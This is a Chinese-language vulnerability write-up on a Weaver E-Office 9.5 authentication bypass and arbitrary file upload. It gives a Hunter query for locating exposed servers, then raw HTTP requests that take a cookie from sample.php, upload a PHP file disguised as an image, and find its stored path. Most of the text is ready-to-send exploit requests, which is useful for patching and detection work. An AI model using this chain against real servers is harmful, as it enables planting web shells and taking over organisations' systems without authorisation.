泛微E-Office file-upload任意文件上传漏洞
一、漏洞简介
泛微E-Office是一款标准化的协同 OA 办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。<font style="color:rgba(0, 0, 0, 0.9);">泛微e-office 存在权限绕过漏洞(测试页面sample.php),攻击者可以通过此页面获取有效cookie绕过权限校验,利用后台文件上传漏洞上传后门文件获取服务器控制权限。</font>
<font style="color:rgb(0, 0, 0);">二、影响版本</font>
- <font style="color:rgb(0, 0, 0);">泛微 E-Office 9.5</font>
<font style="color:rgb(0, 0, 0);">三、资产测绘</font>
- hunter
app.name="泛微 e-office OA" - 特征
<font style="color:rgb(0, 0, 0);">四、漏洞复现</font>
- 获取有效cookie
GET /sample.php HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
- 利用上一步获取到的cookie上传文件
POST /inc/ext/upload/file-upload.php HTTP/1.1
Host: {hostname}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryc3kzQm4dBRhin8Dk
Cookie: {cookie}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
------WebKitFormBoundaryc3kzQm4dBRhin8Dk
Content-Disposition: form-data; name="userfile"; filename="1.php4"
Content-Type: image/jpeg
<?php phpinfo();?>
------WebKitFormBoundaryc3kzQm4dBRhin8Dk--
- 通过获取到的cookie,获取上传文件位置
GET /general/address/view/get-images.php?alb_id=11&start=0&limit=1 HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Cookie: {cookie}
Accept-Encoding: gzip
/attachment/album/52778860/2.php4
nuclei脚本